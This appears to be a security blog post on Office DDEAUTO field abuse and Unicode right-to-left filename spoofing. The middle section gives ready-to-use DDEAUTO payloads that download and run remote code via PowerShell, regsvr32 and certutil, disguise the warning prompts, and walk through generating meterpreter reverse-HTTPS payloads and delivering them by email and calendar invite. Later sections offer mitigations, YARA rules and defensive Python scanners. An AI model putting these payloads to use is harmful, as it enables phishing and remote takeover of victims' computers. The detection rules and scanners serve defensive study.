Office DDEAUTO attacks

SensePost posted 10 days ago about a vulnerability that can trigger command execution, without the use of macros, when someone opens a specially crafted Office document. Although a little social engineering needs to come into play for the victim to click 'Yes' on the first 2 of 3 message boxes, most end users are easily tricked. They found that by abusing the parameters of the DDEAUTO field they could use PowerShell to download malicious payloads remotely. DDE is a legacy Inter-Process Communication (IPC) mechanism dating back to 1987 that establishes a dynamic data exchange (DDE) link with a document created in another Microsoft Windows-based program: when new information becomes available in the linked document, a DDE field inserts it when you update the field. SensePost discovered that instead of specifying an application like Excel, an attacker can specify another application together with arbitrary parameters as the first parameter, and quoted arguments as the second parameter (which cannot exceed 255 bytes).

Although SensePost only demonstrated this using Word, they left other ideas up to the reader. Over the past week a bunch of other ways to accomplish code execution in Word, Excel, and even Rich Text-based Outlook emails have been thrown around on Twitter. I'll go over some of the items I have been able to test successfully in my lab.

The quick and easy test:
Open a new Word document, press CTRL+F9, paste this between the {} brackets, then save the file:
DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe"

You should have something similar that looks like the image above.

Payloads:
Although popping calc is cute and all for demo purposes, you can do more mischievous things to execute malicious payloads on a target system.

DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -w hidden -nop -ep bypass Start-BitsTransfer -Source "http://willgenovese.com/hax/index.js"; -Destination "index.js" & start c:\\Windows\System32\cmd.exe /c cscript.exe index.js"

DDEAUTO c:\\windows\\system32\\cmd.exe "/k regsvr32 /s /n /u /i:http://willgenovese.com/hax/calc.sct scrobj.dll "

DDEAUTO c:\\windows\\system32\\cmd.exe "/k certutil -urlcache -split -f http://willgenovese.com/hax/test.exe && test.exe"

DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://willgenovese.com/hax/evil.ps1');powershell -e $e "

I’ve also created a bash script that uses CactusTorch to automatically generate reverse TCP/HTTP/HTTPS meterpreter payloads in vbs/hta/js that you can insert into Word documents for testing. https://github.com/xillwillx/CACTUSTORCH_DDEAUTO

I've also seen in the wild that you can obfuscate the message box contents, furthering your social-engineering attempts to trick the user into clicking Yes.
DDEAUTO "C:\\Programs\\Microsoft\\Office\\MSWord\\..\\..\\..\\..\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -NoP -sta -NonI -W Hidden IEX (New-Object System.Net.WebClient).DownloadString('http://willgenovese.com/hax/evil.ps1'); # " "Microsoft Document Security Add-On"

Although PowerShell web-download scripts are easier to do, you might want to have your payload all in one document so it's not calling out for your binary over the network. Dave Kennedy updated his Unicorn Python script to generate an msfvenom meterpreter payload that is base64 encoded and gets decoded when the DDEAUTO is triggered. Dave recently merged some fixes I sent him, along with a way to obfuscate the message boxes.
Open a console in Kali:

IP=`ip -4 addr show eth0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}'`
git clone https://github.com/trustedsec/unicorn.git && cd unicorn
python unicorn.py windows/meterpreter/reverse_https $IP 443 dde
cat powershell_attack.txt  | xclip -selection clipboard | leafpad powershell_attack.txt 

Paste your cat'd payload into Word, save it, then send it to your target. Then, in a new console window, start your meterpreter handler to receive some shells.

IP=`ip -4 addr show eth0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}'`
msfconsole -qx "use exploit/multi/handler;set payload windows/meterpreter/reverse_https;set LHOST '$IP';set LPORT 443; set ExitOnSession false;exploit -j -z"

* If you need your external IP, change the first line of code to:
IP="$(dig +short myip.opendns.com @resolver1.opendns.com)"

Outlook:
You can also trigger this with an Outlook Rich Text email message; the only caveat on Outlook 2013/2016 is that you need to embed an image/chart/object into it first before adding the DDEAUTO payload.
Open a new Word document, press CTRL+F9, and paste your payload between the {} brackets, then open a new Outlook email message. Go to the Format Text tab and change the message to Rich Text formatting.

Copy and paste any image into the body of the message.

From your Word document, copy your DDEAUTO payload and paste it into the body of the email. Enter the recipient etc. and send. You'll get the DDE prompts yourself; just say No to them. When your recipient receives the email, it won't trigger until they press Reply. If they press Yes to the first 2 message boxes, it'll execute your payload.

Calendar Invites:
Another attack vector would be recurring calendar invites. Every time the target opens it they get re-owned.

Mitigations:
This has been tested to work on doc(x/m), dot(x/m), rtf, Word XML, draft msg & oft files; the underlying parsing is done by Word, which triggers this behavior when these file types are opened. Microsoft responded that it is a feature and no further action will be taken to fix it (unless of course the current ransomware attacks and other viruses force their hand).
wdormann made a quick .reg gist hack that helps disable DDEAUTO via the registry, although it does break some things in OneNote.

NVISO also made some YARA rules to detect DDE:

// YARA rules Office DDE
// NVISO 2017/10/10 - 2017/10/12
// https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/

rule Office_DDEAUTO_field {
  strings:
    $a = /.+?\b[Dd][Dd][Ee][Aa][Uu][Tt][Oo]\b.+?/
  condition:
    $a
}

rule Office_DDE_field {
  strings:
    $a = /.+?\b[Dd][Dd][Ee]\b.+?/
  condition:
    $a
}

rule Office_OLE_DDEAUTO {
  strings:
    $a = /\x13\s*DDEAUTO\b[^\x14]+/ nocase
  condition:
    uint32be(0) == 0xD0CF11E0 and $a
}

rule Office_OLE_DDE {
  strings:
    $a = /\x13\s*DDE\b[^\x14]+/ nocase
  condition:
    uint32be(0) == 0xD0CF11E0 and $a
}
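To complement the YARA rules, here is an added Python scanner (my own example, not NVISO's or SensePost's code) that unzips a docx, rejoins the w:instrText runs of each paragraph before looking for a DDE/DDEAUTO instruction (a field split across runs slips past a byte-level regex), and falls back to the same byte-level match as the OLE rule for legacy .doc files. The sample documents it builds are constructed inline and carry only the benign calc field from above.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

W = "{http://schemas.openxmlformats.org/wordprocessingml/2006/main}"
OLE_MAGIC = bytes.fromhex("D0CF11E0A1B11AE1")
DDE_RE = re.compile(r"\bDDE(?:AUTO)?\b.*", re.IGNORECASE | re.DOTALL)  # same intent as the YARA rules
OLE_DDE_RE = re.compile(rb"\x13\s*DDE(?:AUTO)?\b[^\x14]*", re.IGNORECASE)


def _fields_from_docx(data: bytes) -> list[str]:
    """Rejoin each paragraph's w:instrText runs before matching, so a field instruction
    split across many runs (which defeats byte-level regexes) is still seen whole."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if name.startswith("word/") and name.endswith(".xml"):
                root = ET.fromstring(zf.read(name))
                for para in root.iter(W + "p"):
                    instr = "".join(t.text or "" for t in para.iter(W + "instrText"))
                    m = DDE_RE.search(instr)
                    if m:
                        hits.append(f"{name}: {m.group(0).strip()}")
    return hits


def scan_for_dde(data: bytes) -> list[str]:
    """DDE/DDEAUTO instructions from a docx/dotx (zip) or a legacy OLE .doc (byte-level, 8-bit text only)."""
    if data.startswith(b"PK\x03\x04"):
        return _fields_from_docx(data)
    if data.startswith(OLE_MAGIC):
        return [m.group(0)[1:].decode("latin-1").strip() for m in OLE_DDE_RE.finditer(data)]
    return []


def build_docx(instr: str) -> bytes:
    """Constructed minimal docx (not a real Word file): one field split over two w:instrText runs."""
    h = len(instr) // 2
    xml = (f'<w:document xmlns:w="{W[1:-1]}"><w:body><w:p>'
           '<w:r><w:fldChar w:fldCharType="begin"/></w:r>'
           f'<w:r><w:instrText xml:space="preserve">{instr[:h]}</w:instrText></w:r>'
           f'<w:r><w:instrText xml:space="preserve">{instr[h:]}</w:instrText></w:r>'
           '<w:r><w:fldChar w:fldCharType="end"/></w:r></w:p></w:body></w:document>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("word/document.xml", xml)
    return buf.getvalue()


# Constructed samples carrying the benign calc field shown in the post.
CALC_FIELD = 'DDEAUTO c:\\\\windows\\\\system32\\\\cmd.exe "/k calc.exe"'
SAMPLE_DOCX = build_docx(CALC_FIELD)
SAMPLE_OLE = OLE_MAGIC + b"\x00" * 8 + b"\x13 " + CALC_FIELD.encode() + b"\x14 calc\x15"
```

Run it over a mail gateway's attachment quarantine or a file share; anything it returns deserves a look, since DDE fields are rare in legitimate documents.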

tricky.lnk – Unicode Text Spoofing

Collaborative editing can quickly become a textual rap battle fought with increasingly convoluted invocations of U+202a to U+202e

Bidirectional Unicode spoofing is not a new concept; malware has been using the technique for the last decade. But I was toying around with Unicode earlier today for a phishing engagement, and by default Win7 doesn't allow you to create filenames with Unicode chars unless you:

    a. Open RegEdit
    b. Navigate to HKey_Current_User/Control Panel/Input Method
    c. Set REG_SZ “EnableHexNumpad” to be “1” (If there is no EnableHexNumpad, then add it and set its value to 1).
    d. Reboot your system.

I didn't want to do this, so I created a .vbs script that creates a .lnk file that spoofs the file extension with Unicode chars. This allows you to reverse the ".lnk" file extension, append ".txt" to the end, and change the icon to notepad.exe's icon to make it appear as a text file. When executed, the Target payload is a PowerShell web download and execute.
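As an added defender-side check (my own example, not the .vbs script from the post), this Python snippet flags bidirectional control characters in a filename, approximates how a Right-to-Left Override is drawn by a file browser, and compares the apparent extension with the one Windows actually dispatches on. The sample filename is constructed.

```python
import os
import unicodedata

# Explicit bidi embeddings/overrides (U+202A..U+202E) and isolates (U+2066..U+2069).
BIDI_CONTROLS = {chr(c) for c in range(0x202A, 0x202F)} | {chr(c) for c in range(0x2066, 0x206A)}


def find_bidi_controls(name: str) -> list[tuple[int, str]]:
    """Positions and Unicode names of every bidi control character in the filename."""
    return [(i, unicodedata.name(ch)) for i, ch in enumerate(name) if ch in BIDI_CONTROLS]


def apparent_name(name: str) -> str:
    """Approximate what a file browser shows: text after U+202E (RLO) is rendered
    reversed until U+202C (PDF) or end of string; other controls are invisible.
    This is a simplification of the full Unicode bidi algorithm, sufficient for the
    Latin-only filenames used in this trick."""
    out, i = [], 0
    while i < len(name):
        ch = name[i]
        if ch == "\u202e":
            end = name.find("\u202c", i + 1)
            end = len(name) if end == -1 else end
            out.append(name[i + 1:end][::-1])
            i = end + 1
        else:
            if ch not in BIDI_CONTROLS:
                out.append(ch)
            i += 1
    return "".join(out)


def true_extension(name: str) -> str:
    """The extension the OS actually dispatches on, regardless of how the name is drawn."""
    return os.path.splitext(name)[1].lower()


def assess(name: str) -> dict:
    """Report displayed vs. real extension; any bidi control in a filename is suspicious."""
    shown = apparent_name(name)
    controls = find_bidi_controls(name)
    return {
        "shown": shown,
        "shown_ext": true_extension(shown),
        "real_ext": true_extension(name),
        "controls": controls,
        "suspicious": bool(controls),
    }


# Constructed sample: "report", then an RLO, then "txt.lnk"; a browser draws it as
# "reportknl.txt" while Windows treats it as a .lnk shortcut.
SAMPLE_SPOOFED = "report\u202etxt.lnk"
```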